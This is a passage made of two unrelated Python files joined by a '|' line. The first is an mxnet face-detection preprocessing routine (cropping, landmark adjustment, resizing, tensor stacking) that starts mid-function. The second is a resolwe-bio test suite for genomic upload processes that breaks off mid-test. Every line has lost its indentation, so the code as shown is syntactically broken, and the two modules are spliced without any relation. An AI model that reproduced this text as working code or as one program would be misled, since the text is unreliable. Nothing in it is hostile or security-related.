im = cv2.resize(im, None, None, fx=im_scale, fy=im_scale, interpolation=cv2.INTER_LINEAR)
assert im.shape[0]>=SIZE and im.shape[1]>=SIZE
new_rec = roi_rec.copy()
new_rec['boxes'] = roi_rec['boxes'].copy() * im_scale
new_rec['points'] = roi_rec['points'].copy() * im_scale
retry = 0
LIMIT = 25
size = SIZE
while retry<LIMIT:
up, left = (np.random.randint(0, im.shape[0]-size+1), np.random.randint(0, im.shape[1]-size+1))
boxes_new = new_rec['boxes'].copy()
points_new = new_rec['points'].copy()
points_ind_new = new_rec['points_ind'].copy()
im_new = im[up:(up+size), left:(left+size), :]
#print('crop', up, left, size, im_scale)
boxes_new[:,0] -= left
boxes_new[:,2] -= left
boxes_new[:,1] -= up
boxes_new[:,3] -= up
points_ind = np.where(points_ind_new==1)[0]
if (len(points_ind)>0):
points_new[points_ind, 0] -= left
points_new[points_ind, 2] -= left
points_new[points_ind, 4] -= left
points_new[points_ind, 6] -= left
points_new[points_ind, 8] -= left
points_new[points_ind, 1] -= up
points_new[points_ind, 3] -= up
points_new[points_ind, 5] -= up
points_new[points_ind, 7] -= up
points_new[points_ind, 9] -= up
#im_new = cv2.resize(im_new, (SIZE, SIZE), interpolation=cv2.INTER_LINEAR)
#boxes_new *= im_scale
#print(origin_shape, im_new.shape, im_scale)
valid = []
valid_boxes = []
valid_points = []
valid_points_ind = []
for i in range(boxes_new.shape[0]):
box = boxes_new[i]
center = np.array(([box[0], box[1]]+[box[2], box[3]]))/2
#box[0] = max(0, box[0])
#box[1] = max(0, box[1])
#box[2] = min(im_new.shape[1], box[2])
#box[3] = min(im_new.shape[0], box[3])
box_size = max(box[2]-box[0], box[3]-box[1])
if center[0] < 0 or center[1] < 0 or center[0] >= im_new.shape[1] or center[1] >= im_new.shape[0]:
continue
if box_size < config.TRAIN.MIN_BOX_SIZE:
continue
valid.append(i)
valid_boxes.append(box)
valid_points.append(points_new[i])
valid_points_ind.append(points_ind_new[i])
if len(valid) > 0 or retry == LIMIT-1:
im = im_new
new_rec['boxes'] = np.array(valid_boxes)
new_rec['gt_classes'] = new_rec['gt_classes'][valid]
new_rec['points'] = np.array(valid_points)
new_rec['points_ind'] = np.array(valid_points_ind)
break
retry+=1
if config.COLOR_JITTERING>0.0:
im = im.astype(np.float32)
im = color_aug(im, config.COLOR_JITTERING)
DEBUG = True #TODO debug
if DEBUG:
global TMP_ID
if TMP_ID < 10:
tim = im.copy().astype(np.uint8)
for i in range(new_rec['boxes'].shape[0]):
box = new_rec['boxes'][i].copy().astype(np.int)
cv2.rectangle(tim, (box[0], box[1]), (box[2], box[3]), (255, 0, 0), 1)
points_ind_ = new_rec['points_ind'][i].copy().astype(np.int)
if points_ind_:
points_ = new_rec['points'][i].copy().astype(np.int)
for j in range(5):
cv2.circle(tim, (points_[2*j], points_[2*j+1]), 3, [255, 0, 0])
filename = './tmp/D%d.png' % TMP_ID
print(roi_rec['image'])
print('write', filename)
TMP_ID +=1
cv2.imwrite(filename, tim)
im_tensor = transform(im, config.PIXEL_MEANS)
processed_ims.append(im_tensor)
#print('boxes', new_rec['boxes'], file=sys.stderr)
im_info = [im_tensor.shape[2], im_tensor.shape[3], im_scale]
new_rec['im_info'] = im_info
processed_roidb.append(new_rec)
return processed_ims, processed_roidb
def resize(im, target_size, max_size, stride=0, min_size=0):
"""
only resize input image to target size and return scale
:param im: BGR image input by opencv
:param target_size: one dimensional size (the short side)
:param max_size: one dimensional max size (the long side)
:param stride: if given, pad the image to designated stride
:return:
"""
im_shape = im.shape
im_size_min = np.min(im_shape[0:2])
im_size_max = np.max(im_shape[0:2])
im_scale = float(target_size) / float(im_size_min)
# prevent bigger axis from being more than max_size:
if np.round(im_scale * im_size_max) > max_size:
im_scale = float(max_size) / float(im_size_max)
if min_size>0 and np.round(im_scale*im_size_min)<min_size:
im_scale = float(min_size) / float(im_size_min)
im = cv2.resize(im, None, None, fx=im_scale, fy=im_scale, interpolation=cv2.INTER_LINEAR)
if stride == 0:
return im, im_scale
else:
# pad to product of stride
im_height = int(np.ceil(im.shape[0] / float(stride)) * stride)
im_width = int(np.ceil(im.shape[1] / float(stride)) * stride)
im_channel = im.shape[2]
padded_im = np.zeros((im_height, im_width, im_channel))
padded_im[:im.shape[0], :im.shape[1], :] = im
return padded_im, im_scale
def transform(im, pixel_means):
"""
transform into mxnet tensor,
subtract pixel size and transform to correct format
:param im: [height, width, channel] in BGR
:param pixel_means: [B, G, R pixel means]
:return: [batch, channel, height, width]
"""
im_tensor = np.zeros((1, 3, im.shape[0], im.shape[1]))
for i in range(3):
im_tensor[0, i, :, :] = im[:, :, 2 - i] - pixel_means[2 - i]
return im_tensor
def transform_inverse(im_tensor, pixel_means):
"""
transform from mxnet im_tensor to ordinary RGB image
im_tensor is limited to one image
:param im_tensor: [batch, channel, height, width]
:param pixel_means: [B, G, R pixel means]
:return: im [height, width, channel(RGB)]
"""
assert im_tensor.shape[0] == 1
im_tensor = im_tensor.copy()
# put channel back
channel_swap = (0, 2, 3, 1)
im_tensor = im_tensor.transpose(channel_swap)
im = im_tensor[0]
assert im.shape[2] == 3
im += pixel_means[[2, 1, 0]]
im = im.astype(np.uint8)
return im
def tensor_vstack(tensor_list, pad=0):
"""
vertically stack tensors
:param tensor_list: list of tensor to be stacked vertically
:param pad: label to pad with
:return: tensor with max shape
"""
ndim = len(tensor_list[0].shape)
dtype = tensor_list[0].dtype
islice = tensor_list[0].shape[0]
dimensions = []
first_dim = sum([tensor.shape[0] for tensor in tensor_list])
dimensions.append(first_dim)
for dim in range(1, ndim):
dimensions.append(max([tensor.shape[dim] for tensor in tensor_list]))
if pad == 0:
all_tensor = np.zeros(tuple(dimensions), dtype=dtype)
elif pad == 1:
all_tensor = np.ones(tuple(dimensions), dtype=dtype)
else:
all_tensor = np.full(tuple(dimensions), pad, dtype=dtype)
if ndim == 1:
for ind, tensor in enumerate(tensor_list):
all_tensor[ind*islice:(ind+1)*islice] = tensor
elif ndim == 2:
for ind, tensor in enumerate(tensor_list):
all_tensor[ind*islice:(ind+1)*islice, :tensor.shape[1]] = tensor
elif ndim == 3:
for ind, tensor in enumerate(tensor_list):
all_tensor[ind*islice:(ind+1)*islice, :tensor.shape[1], :tensor.shape[2]] = tensor
elif ndim == 4:
for ind, tensor in enumerate(tensor_list):
all_tensor[ind*islice:(ind+1)*islice, :tensor.shape[1], :tensor.shape[2], :tensor.shape[3]] = tensor
elif ndim == 5:
for ind, tensor in enumerate(tensor_list):
all_tensor[ind*islice:(ind+1)*islice, :tensor.shape[1], :tensor.shape[2], :tensor.shape[3], :tensor.shape[4]] = tensor
else:
print(tensor_list[0].shape)
raise Exception('Sorry, unimplemented.')
return all_tensor
|
import os
from pathlib import Path
from resolwe.flow.models import Data
from resolwe.test import tag_process, with_resolwe_host
from resolwe_bio.utils.test import KBBioProcessTestCase, skipUnlessLargeFiles
class UploadProcessorTestCase(KBBioProcessTestCase):
@tag_process("upload-bam", "upload-bam-indexed")
def test_bam_upload(self):
inputs = {
"src": "alignment_name_sorted.bam",
"species": "Homo sapiens",
"build": "hg19",
}
upload_bam = self.run_process("upload-bam", inputs)
self.assertFile(upload_bam, "bam", "alignment_position_sorted.bam")
self.assertFile(upload_bam, "bai", "alignment_bam_upload_index.bai")
self.assertFile(upload_bam, "stats", "alignment_bam_upload_stats.txt")
self.assertFile(upload_bam, "bigwig", "alignment_bam_upload_bigwig.bw")
self.assertFields(upload_bam, "species", "Homo sapiens")
self.assertFields(upload_bam, "build", "hg19")
inputs = {
"src": "alignment_position_sorted.bam",
"src2": "alignment_bam_upload_index.bam.bai",
"species": "Homo sapiens",
"build": "hg19",
}
upload_bam = self.run_process("upload-bam-indexed", inputs, Data.STATUS_ERROR)
self.assertEqual(
upload_bam.process_error[0],
"BAI should have the same name as BAM with .bai extension",
)
inputs = {
"src": "alignment_position_sorted.bam",
"src2": "alignment_position_sorted.bam.bai",
"species": "Homo sapiens",
"build": "hg19",
}
upload_bam = self.run_process("upload-bam-indexed", inputs)
self.assertFile(upload_bam, "bam", "alignment_position_sorted.bam")
self.assertFile(upload_bam, "bai", "alignment_position_sorted.bam.bai")
self.assertFile(upload_bam, "stats", "alignment_bam_upload_stats.txt")
self.assertFile(upload_bam, "bigwig", "alignment_bam_upload_bigwig.bw")
self.assertFields(upload_bam, "species", "Homo sapiens")
self.assertFields(upload_bam, "build", "hg19")
@with_resolwe_host
@tag_process("upload-expression")
def test_upload_expression(self):
input_folder = Path("test_upload_expression") / "input"
output_folder = Path("test_upload_expression") / "output"
inputs = {
"exp_type": "TPM",
"exp_name": "Expression",
"source": "UCSC",
"species": "Homo sapiens",
"build": "hg19",
}
self.run_process("upload-expression", inputs, Data.STATUS_ERROR)
inputs = {
"exp": input_folder / "exp_1_tpm.tab.gz",
"rc": input_folder / "exp_1_rc.tab.gz",
"exp_name": "Expression",
"source": "UCSC",
"species": "Homo sapiens",
"build": "hg19",
}
self.run_process("upload-expression", inputs, Data.STATUS_ERROR)
inputs = {
"rc": input_folder / "exp_1_rc.tab.gz",
"exp_name": "Expression",
"source": "UCSC",
"species": "Homo sapiens",
"build": "hg19",
}
exp_3 = self.run_process("upload-expression", inputs)
self.assertFile(exp_3, "rc", output_folder / "exp_1_rc.tab.gz")
self.assertFile(exp_3, "exp", output_folder / "exp_1_rc.tab.gz")
self.assertFile(
exp_3,
"exp_set",
output_folder / "exp_1_rc_expressions3.txt.gz",
compression="gzip",
)
self.assertJSON(
exp_3, exp_3.output["exp_json"], "", output_folder / "exp_1.json.gz"
)
self.assertFields(exp_3, "species", "Homo sapiens")
self.assertFields(exp_3, "build", "hg19")
self.assertFields(exp_3, "feature_type", "gene")
inputs = {
"exp": input_folder / "exp_1_tpm.tab.gz",
"exp_type": "TPM",
"exp_name": "Expression",
"source": "UCSC",
"species": "Homo sapiens",
"build": "hg19",
}
exp_4 = self.run_process("upload-expression", inputs)
self.assertFile(exp_4, "exp", output_folder / "exp_1_tpm.tab.gz")
self.assertFile(
exp_4,
"exp_set",
output_folder / "exp_1_tpm_expressions.txt.gz",
compression="gzip",
)
inputs = {
"rc": input_folder / "exp_1_rc.tab.gz",
"exp": input_folder / "exp_1_tpm.tab.gz",
"exp_type": "TPM",
"exp_name": "Expression",
"source": "UCSC",
"species": "Homo sapiens",
"build": "hg19",
}
exp_5 = self.run_process("upload-expression", inputs)
self.assertFields(exp_5, "exp_type", "TPM")
self.assertFile(exp_5, "exp", output_folder / "exp_1_tpm.tab.gz")
self.assertFile(exp_5, "rc", output_folder / "exp_1_rc.tab.gz")
self.assertFile(
exp_5,
"exp_set",
output_folder / "exp_1_rc_expressions5.txt.gz",
compression="gzip",
)
self.assertJSON(
exp_5, exp_5.output["exp_json"], "", output_folder / "exp_1_norm.json.gz"
)
self.assertJSON(
exp_5,
exp_5.output["exp_set_json"],
"",
output_folder / "upload_exp_norm_set.json.gz",
)
inputs = {
"rc": input_folder / "exp_mac_line_ending.txt.gz",
"exp_name": "Expression",
"source": "UCSC",
"species": "Homo sapiens",
"build": "hg19",
}
exp_6 = self.run_process("upload-expression", inputs)
self.assertJSON(
exp_6, exp_6.output["exp_json"], "", output_folder / "exp.json.gz"
)
self.assertFile(exp_6, "rc", output_folder / "exp_mac_line_ending.tab.gz")
self.assertFile(
exp_6,
"exp_set",
output_folder / "exp_mac_line_ending_expressions.txt.gz",
compression="gzip",
)
inputs = {
"rc": input_folder / "exp_unix_line_ending.txt.gz",
"exp_name": "Expression",
"source": "UCSC",
"species": "Homo sapiens",
"build": "hg19",
}
exp_7 = self.run_process("upload-expression", inputs)
self.assertJSON(
exp_7, exp_7.output["exp_json"], "", output_folder / "exp.json.gz"
)
inputs = {
"rc": input_folder / "exp_windows_line_ending.txt.gz",
"exp_name": "Expression",
"source": "UCSC",
"species": "Homo sapiens",
"build": "hg19",
}
exp_8 = self.run_process("upload-expression", inputs)
self.assertJSON(
exp_8, exp_8.output["exp_json"], "", output_folder / "exp.json.gz"
)
# Check handling of numerical feature_ids in expression file
inputs = {
"rc": input_folder / "mm_ncbi_exp.tab.gz",
"exp_name": "Expression",
"source": "NCBI",
"species": "Mus musculus",
"build": "hg19",
}
exp_9 = self.run_process("upload-expression", inputs)
self.assertFile(
exp_9,
"exp_set",
output_folder / "mm_ncbi_exp_set.txt.gz",
compression="gzip",
)
inputs = {
"exp": input_folder / "exp_1_tpm.tsv.gz",
"exp_type": "TPM",
"exp_name": "Expression",
"source": "UCSC",
"species": "Homo sapiens",
"build": "hg19",
}
exp_10 = self.run_process("upload-expression", inputs)
self.assertFile(exp_10, "exp", output_folder / "exp_1_tpm.tab.gz")
self.assertFile(
exp_10,
"exp_set",
output_folder / "exp_1_tpm_expressions.txt.gz",
compression="gzip",
)
# Test files with wrong extension
inputs = {
"rc": input_folder / "exp_1_rc.xlsx.gz",
"exp": input_folder / "exp_1_tpm.tab.gz",
"exp_type": "TPM",
"exp_name": "Expression",
"source": "UCSC",
"species": "Homo sapiens",
"build": "hg19",
}
self.run_process("upload-expression", inputs, Data.STATUS_ERROR)
inputs = {
"exp": input_folder / "exp_1_tpm.gz",
"exp_type": "TPM",
"exp_name": "Expression",
"source": "UCSC",
"species": "Homo sapiens",
"build": "hg19",
}
self.run_process("upload-expression", inputs, Data.STATUS_ERROR)
inputs = {
"rc": input_folder / "exp.1_rc.tab.gz",
"exp_name": "Expression",
"source": "UCSC",
"species": "Homo sapiens",
"build": "hg19",
}
exp_13 = self.run_process("upload-expression", inputs)
self.assertFields(exp_13, "rc", {"file": "exp.1_rc.tab.gz", "total_size": 99})
self.assertFields(exp_13, "exp", {"file": "exp.1_rc.tab.gz", "total_size": 99})
@with_resolwe_host
@tag_process("upload-cxb", "upload-expression-cuffnorm")
def test_upload_cuffquant_expr(self):
input_folder = Path("test_upload_expression") / "input"
output_folder = Path("test_upload_expression") / "output"
inputs = {
"src": "cuffquant 1.cxb",
"source": "UCSC",
"species": "Homo sapiens",
"build": "hg19",
}
cxb = self.run_process("upload-cxb", inputs)
inputs = {"exp": input_folder / "cuffquant_exp.tab", "cxb": cxb.id}
exp = self.run_process("upload-expression-cuffnorm", inputs)
self.assertFields(exp, "feature_type", "gene")
self.assertFile(
exp,
"exp_set",
output_folder / "cuffquant_exp_expressions.txt.gz",
compression="gzip",
)
@tag_process("upload-fastq-paired")
def test_upload_paired_end_reads(self):
input_folder = Path("test_fastq_upload") / "input"
output_folder = Path("test_fastq_upload") / "output"
inputs = {
"src1": [
input_folder / "mate1_reordered.fastq.gz",
input_folder / "mate1_diff_num_reads.fastq.gz",
],
"src2": [input_folder / "mate2_reordered.fastq.gz"],
}
wrong_mates = self.run_process("upload-fastq-paired", inputs, Data.STATUS_ERROR)
error_msg = [
"The number of mate-pair files in split-lane samples must match. 2 and 1 "
"input files were given for the -fq and -fq2 inputs, respectively."
]
self.assertEqual(wrong_mates.process_error, error_msg)
inputs = {
"src1": [
input_folder / "mate1_reordered.fastq.gz",
input_folder / "mate1_reordered.fastq.gz",
],
"src2": [input_folder / "mate2_reordered.fastq.gz"],
}
wrong_mates2 = self.run_process(
"upload-fastq-paired", inputs, Data.STATUS_ERROR
)
error_msg = [
"Non-unique input file names detected: ['mate1_reordered.fastq.gz']."
]
self.assertEqual(wrong_mates2.process_error, error_msg)
inputs = {
"src1": [input_folder / "mate1_diff_num_reads.fastq.gz"],
"src2": [input_folder / "mate2_diff_num_reads.fastq.gz"],
}
diff_numb_reads = self.run_process(
"upload-fastq-paired", inputs, Data.STATUS_ERROR
)
error_msg = [
"Format error in mate-pairs mate1_diff_num_reads.fastq.gz and mate2_diff_num_reads.fastq.gz. "
"Error in sequence file at unknown line: Reads are improperly paired. "
"There are more reads in file 2 than in file 1."
]
self.assertEqual(diff_numb_reads.process_error, error_msg)
inputs = {
"src1": [input_folder / "mate1_reordered.fastq.gz"],
"src2": [input_folder / "mate2_reordered.fastq.gz"],
}
unordered_reads = self.run_process(
"upload-fastq-paired", inputs, Data.STATUS_ERROR
)
error_msg = [
"Format error in mate-pairs mate1_reordered.fastq.gz and mate2_reordered.fastq.gz. "
"Error in sequence file at unknown line: Reads are improperly paired. Read "
"name 'read1/1 some text' in file 1 does not match 'read2/2' in file 2."
]
self.assertEqual(unordered_reads.process_error, error_msg)
inputs = {
"src1": [input_folder / "mate1.fastq.gz"],
"src2": [input_folder / "mate2.fastq.gz"],
}
self.run_process("upload-fastq-paired", inputs, Data.STATUS_ERROR)
inputs = {
"src1": [input_folder / "rRNA_forw.fastq.gz"],
"src2": [input_folder / "rRNA_rew.fastq.gz"],
}
reads = self.run_process("upload-fastq-paired", inputs)
self.assertFiles(
reads, "fastq", [output_folder / "rRNA_forw.fastq.gz"], compression="gzip"
)
self.assertFiles(
reads, "fastq2", [output_folder / "rRNA_rew.fastq.gz"], compression="gzip"
)
del reads.output["fastqc_url"][0]["total_size"] # Non-deterministic output.
self.assertFields(
reads,
"fastqc_url",
[
{
"file": "fastqc/rRNA_forw_fastqc/fastqc_report.html",
"refs": ["fastqc/rRNA_forw_fastqc"],
"size": 343222,
}
],
)
del reads.output["fastqc_url2"][0]["total_size"] # Non-deterministic output.
self.assertFields(
reads,
"fastqc_url2",
[
{
"file": "fastqc/rRNA_rew_fastqc/fastqc_report.html",
"refs": ["fastqc/rRNA_rew_fastqc"],
"size": 323297,
}
],
)
merged_lanes = self.run_process(
"upload-fastq-paired",
{
"src1": [
input_folder / "old_encoding.fastq.gz",
input_folder / "old_encoding1.fastq.gz",
],
"src2": [
input_folder / "old_encoding_R2.fastq.gz",
input_folder / "old_encoding1_R2.fastq.gz",
],
"merge_lanes": True,
},
)
self.assertFiles(
merged_lanes,
"fastq",
[output_folder / "paired_end_merged_lanes_mate1.fastq.gz"],
compression="gzip",
)
self.assertFiles(
merged_lanes,
"fastq2",
[output_folder / "paired_end_merged_lanes_mate2.fastq.gz"],
compression="gzip",
)
inputs = {
"src1": [input_folder / "rRNA_forw.fastq"],
"src2": [input_folder / "rRNA_rew.fastq"],
}
reads = self.run_process("upload-fastq-paired", inputs)
self.assertFiles(
reads, "fastq", [output_folder / "rRNA_forw.fastq.gz"], compression="gzip"
)
self.assertFiles(
reads, "fastq2", [output_folder / "rRNA_rew.fastq.gz"], compression="gzip"
)
del reads.output["fastqc_url"][0]["total_size"] # Non-deterministic output.
self.assertFields(
reads,
"fastqc_url",
[
{
"file": "fastqc/rRNA_forw_fastqc/fastqc_report.html",
"refs": ["fastqc/rRNA_forw_fastqc"],
"size": 343222,
}
],
)
del reads.output["fastqc_url2"][0]["total_size"] # Non-deterministic output.
self.assertFields(
reads,
"fastqc_url2",
[
{
"file": "fastqc/rRNA_rew_fastqc/fastqc_report.html",
"refs": ["fastqc/rRNA_rew_fastqc"],
"size": 323297,
}
],
)
inputs = {
"src1": [input_folder / "genome.fasta.gz"],
"src2": [input_folder / "rRNA_rew.fastq"],
}
reads = self.run_process("upload-fastq-paired", inputs, Data.STATUS_ERROR)
@tag_process("upload-fastq-single")
def test_upload_single_end_reads(self):
input_folder = Path("test_fastq_upload") / "input"
output_folder = Path("test_fastq_upload") / "output"
empty_input = self.run_process(
"upload-fastq-single",
{"src": [input_folder / "empty.fastq.gz"]},
Data.STATUS_ERROR,
)
error_msg = ["Input file empty.fastq.gz contains no read sequences."]
self.assertEqual(empty_input.process_error, error_msg)
garbage_input = self.run_process(
"upload-fastq-single",
{"src": [input_folder / "garbage.fastq.gz"]},
Data.STATUS_ERROR,
)
error_msg = [
"Error in file garbage.fastq.gz. Error in FASTQ file at line 1: Line expected "
"to start with '@', but found 'S'"
]
self.assertEqual(garbage_input.process_error, error_msg)
garbage_input_2 = self.run_process(
"upload-fastq-single",
{"src": [input_folder / "garbage2.fastq.gz"]},
Data.STATUS_ERROR,
)
error_msg = [
"Error in file garbage2.fastq.gz. Error in FASTQ file at line 3: Sequence descriptions "
"don't match ('Some random content' != '+++').\nThe second sequence description must "
"be either empty or equal to the first description."
]
self.assertEqual(garbage_input_2.process_error, error_msg)
missing_qual = self.run_process(
"upload-fastq-single",
{"src": [input_folder / "missing_qual.fastq.gz"]},
Data.STATUS_ERROR,
)
error_msg = [
"Error in file missing_qual.fastq.gz. Error in FASTQ file at line 16: "
"Premature end of file encountered. The incomplete final record was: "
"'@read4/1\\nGACAGGCCGTTTGAATGTTGACGGGATGTT\\n+\\n'"
]
self.assertEqual(missing_qual.process_error, error_msg)
inputs = {"src": [input_folder / "mate1.fastq.gz"]}
self.run_process("upload-fastq-single", inputs, Data.STATUS_ERROR)
inputs = {
"src": [
input_folder / "rRNA_forw.fastq.gz",
input_folder / "rRNA_rew.fastq.gz",
]
}
reads = self.run_process("upload-fastq-single", inputs)
self.assertFiles(
reads,
"fastq",
[
output_folder / "rRNA_forw_single.fastq.gz",
output_folder / "rRNA_rew.fastq.gz",
],
compression="gzip",
)
del reads.output["fastqc_url"][0]["total_size"] # Non-deterministic output.
del reads.output["fastqc_url"][1]["total_size"] # Non-deterministic output.
self.assertFields(
reads,
"fastqc_url",
[
{
"file": "fastqc/rRNA_forw_fastqc/fastqc_report.html",
"refs": ["fastqc/rRNA_forw_fastqc"],
"size": 343222,
},
{
"file": "fastqc/rRNA_rew_fastqc/fastqc_report.html",
"refs": ["fastqc/rRNA_rew_fastqc"],
"size": 323297,
},
],
)
merged_lanes = self.run_process(
"upload-fastq-single",
{
"src": [
input_folder / "rRNA_forw.fastq.gz",
input_folder / "rRNA_rew.fastq.gz",
],
"merge_lanes": True,
},
)
self.assertFiles(
merged_lanes,
"fastq",
[output_folder / "merged_single_end_reads.fastq.gz"],
compression="gzip",
)
inputs = {
"src": [
input_folder / "rRNA_forw.fq.gz",
input_folder / "rRNA_rew.fq.gz",
]
}
reads = self.run_process("upload-fastq-single", inputs)
self.assertFiles(
reads,
"fastq",
[
output_folder / "rRNA_forw.fastq.gz",
output_folder / "rRNA_rew.fastq.gz",
],
compression="gzip",
)
@tag_process("upload-diffexp")
def test_upload_de(self):
inputs = {
"src": "./diff_exp/input/deseq2_output.tab.gz",
"source": "DICTYBASE",
"gene_id": "gene_id",
"logfc": "log2FoldChange",
"fdr": "padj",
"pvalue": "pvalue",
"stat": "stat",
"species": "Dictyostelium discoideum",
"build": "dd-05-2009",
"feature_type": "gene",
}
diff_exp = self.run_process("upload-diffexp", inputs)
self.assertFile(diff_exp, "raw", "./diff_exp/input/deseq2_output.tab.gz")
self.assertJSON(
diff_exp,
diff_exp.output["de_json"],
"",
"./diff_exp/output/deseq2_volcano_plot.json.gz",
)
# Test for malformed DE file. deseq2_bad_output.tab.gz file has a
# mangled last value in last column where we replaced dot for a comma.
# When importing to pandas DataFrame, this is no longer a float and
# should throw an error.
inputs["src"] = "./diff_exp/input/deseq2_bad_output.tab.gz"
diff_bad = self.run_process("upload-diffexp", inputs, Data.STATUS_ERROR)
error_msg = [
"Column padj is not numeric. Please make sure that the input file has valid numeric values (i.e. "
"periods for decimal places)."
]
self.assertEqual(diff_bad.process_error, error_msg)
@tag_process("upload-diffexp")
def test_upload_de_check_field_type(self):
inputs = {
"src": "./diff_exp/input/diff_exp_check_geneid_type.tab.gz",
"source": "DICTYBASE",
"gene_id": "index",
"logfc": "log2FoldChange",
"fdr": "padj",
"pvalue": "pvalue",
"stat": "stat",
"species": "Dictyostelium discoideum",
"build": "dd-05-2009",
"feature_type": "gene",
}
diff_exp = self.run_process("upload-diffexp", inputs)
saved_json, test_json = self.get_json(
"./diff_exp/output/diff_exp_check_types.json.gz", diff_exp.output["de_json"]
)
self.assertEqual(test_json, saved_json)
all(self.assertIsInstance(gene, str) for gene in test_json["gene_id"])
@tag_process("upload-bed")
def test_upload_bed(self):
inputs = {"src": "bad.bed", "species": "Homo sapiens", "build": "hg19"}
bed = self.run_process("upload-bed", inputs, Data.STATUS_ERROR)
inputs = {"src": "good.bed", "species": "Homo sapiens", "build": "hg19"}
bed = self.run_process("upload-bed", inputs)
self.assertFile(bed, "bed", "good.bed")
self.assertFile(bed, "tbi_jbrowse", "good.bed.gz.tbi")
@tag_process("upload-geneset")
def test_upload_geneset(self):
inputs = {"src": "geneset.tab.gz", "source": "UCSC", "species": "Homo sapiens"}
geneset = self.run_process("upload-geneset", inputs)
self.assertFile(geneset, "geneset", "geneset_out.tab.gz", compression="gzip")
self.assertFields(geneset, "source", "UCSC")
self.assertFields(geneset, "species", "Homo sapiens")
self.assertJSON(geneset, geneset.output["geneset_json"], "", "geneset.json.gz")
@tag_process("create-geneset")
def test_create_geneset(self):
inputs = {
"genes": ["ABC", "DEF", "GHI"],
"source": "UCSC",
"species": "Homo sapiens",
}
geneset = self.run_process("create-geneset", inputs)
self.assertFile(geneset, "geneset", "geneset_2.tab.gz", compression="gzip")
self.assertJSON(
geneset, geneset.output["geneset_json"], "", "geneset_2.json.gz"
)
self.assertFields(geneset, "source", "UCSC")
self.assertFields(geneset, "species", "Homo sapiens")
inputs = {
"genes": ["1", "3", "3", "2"],
"source": "NCBI",
"species": "Homo sapiens",
}
geneset_2 = self.run_process("create-geneset", inputs)
self.assertFile(geneset_2, "geneset", "geneset_3.tab.gz", compression="gzip")
self.assertJSON(
geneset_2, geneset_2.output["geneset_json"], "", "geneset_3.json.gz"
)
self.assertEqual(geneset_2.process_warning[0], "Removed duplicated genes.")
@tag_process("create-geneset-venn")
def test_create_venn(self):
inputs = {
"genes": ["ABC", "GHI", "DEF"],
"source": "UCSC",
"venn": "venn.json.gz",
"species": "Homo sapiens",
}
venn = self.run_process("create-geneset-venn", inputs)
self.assertFile(venn, "geneset", "geneset_venn.tab.gz", compression="gzip")
self.assertJSON(venn, venn.output["geneset_json"], "", "geneset_venn.json.gz")
self.assertJSON(venn, venn.output["venn"], "", "venn.json.gz")
self.assertFields(venn, "source", "UCSC")
self.assertFields(venn, "species", "Homo sapiens")
@tag_process("upload-fastq-single")
def test_upload_reformating_single(self):
inputs = {"src": ["old_encoding.fastq.gz"]}
reads = self.run_process("upload-fastq-single", inputs)
self.assertFiles(
reads, "fastq", ["old_encoding_transformed.fastq.gz"], compression="gzip"
)
@tag_process("upload-fastq-paired")
def test_upload_reformating_paired(self):
inputs = {
"src1": ["old_encoding.fastq.gz", "old_encoding1.fastq.gz"],
"src2": ["old_encoding_R2.fastq.gz", "old_encoding1_R2.fastq.gz"],
}
reads = self.run_process("upload-fastq-paired", inputs)
self.assertFiles(
reads,
"fastq",
["old_encoding_transformed.fastq.gz", "old_encoding1_transformed.fastq.gz"],
compression="gzip",
)
self.assertFiles(
reads,
"fastq2",
[
"old_encoding_transformed_R2.fastq.gz",
"old_encoding1_transformed_R2.fastq.gz",
],
compression="gzip",
)
@tag_process("upload-master-file")
def test_upload_master_file(self):
inputs = {"src": "56G_masterfile_corrupted.txt", "panel_name": "56G panel, v2"}
master_file = self.run_process("upload-master-file", inputs, Data.STATUS_ERROR)
# Check for non-unique amplicon names
inputs["src"] = "56G masterfile_dup_amplicon_names.txt.gz"
master_file = self.run_process("upload-master-file", inputs, Data.STATUS_ERROR)
# Check if primer sequences are allowed also in lowercase
inputs["src"] = "56G masterfile_lowercase_bases.txt.gz"
self.run_process("upload-master-file", inputs)
inputs["src"] = "56G_masterfile_170113.txt.gz"
master_file = self.run_process("upload-master-file", inputs)
self.assertFile(master_file, "bedfile", "amplicon_master_file_merged.bed")
self.assertFile(
master_file, "nomergebed", "amplicon_master_file_nomergebed.bed"
)
self.assertFile(
master_file, "olapfreebed", "amplicon_master_file_olapfreebed.bed"
)
self.assertFile(master_file, "primers", "amplicon_primers.bed")
self.assertFields(master_file, "panel_name", "56G panel, v2")
@tag_process("upload-etc")
def test_upload_etc(self):
inputs = {"src": "etc_upload_input.xls"}
etc = self.run_process("upload-etc", inputs)
self.assertFile(etc, "etcfile", "test_etc.json.gz")
@tag_process("upload-fasta-nucl")
def test_upload_nucl_seq(self):
seq = self.run_process(
"upload-fasta-nucl",
{
"src": os.path.join("nucl_seq", "input", "genome.fasta.gz"),
"species": "Dictyostelium discoideum",
"build": "dicty_2.7",
},
)
self.assertFile(
seq,
"fastagz",
os.path.join("nucl_seq", "output", "genome.fasta.gz"),
compression="gzip",
)
self.assertFile(
seq, "fasta", os.path.join("nucl_seq", "output", "genome.fasta")
)
self.assertFile(
seq, "fai", os.path.join("nucl_seq", "output", "genome.fasta.fai")
)
self.assertFile(
seq, "fasta_dict", os.path.join("nucl_seq", "output", "genome.dict")
)
self.assertFields(seq, "species", "Dictyostelium discoideum")
self.assertFields(seq, "build", "dicty_2.7")
self.assertFields(seq, "num_seqs", 1)
empty_input = {
"src": os.path.join("nucl_seq", "input", "empty.fasta"),
"species": "Dictyostelium discoideum",
"build": "dicty_2.7",
}
empty = self.run_process("upload-fasta-nucl", empty_input, Data.STATUS_ERROR)
error_msg = ["The uploaded .FASTA file empty.fasta contains no sequence data."]
self.assertEqual(empty.process_error, error_msg)
malformed_input = {
"src": os.path.join("nucl_seq", "input", "malformed.fasta"),
"species": "Dictyostelium discoideum",
"build": "dicty_2.7",
}
malformed = self.run_process(
"upload-fasta-nucl", malformed_input, Data.STATUS_ERROR
)
error_msg = [
"Format error in the uploaded file malformed.fasta. Error in FASTA file at "
"line 1: Expected '>' at beginning of record, but got 'foo'."
]
self.assertEqual(malformed.process_error, error_msg)
incomplete_input = {
"src": os.path.join("nucl_seq", "input", "incomplete.fasta"),
"species": "Dictyostelium discoideum",
"build": "dicty_2.7",
}
incomplete = self.run_process(
"upload-fasta-nucl", incomplete_input, Data.STATUS_ERROR
)
error_msg = [
"The uploaded .FASTA file incomplete.fasta contains no sequence data."
]
self.assertEqual(incomplete.process_error, error_msg)
@tag_process("upload-variants-vcf")
def test_upload_vcf(self):
vcf = self.run_process(
"upload-variants-vcf",
{
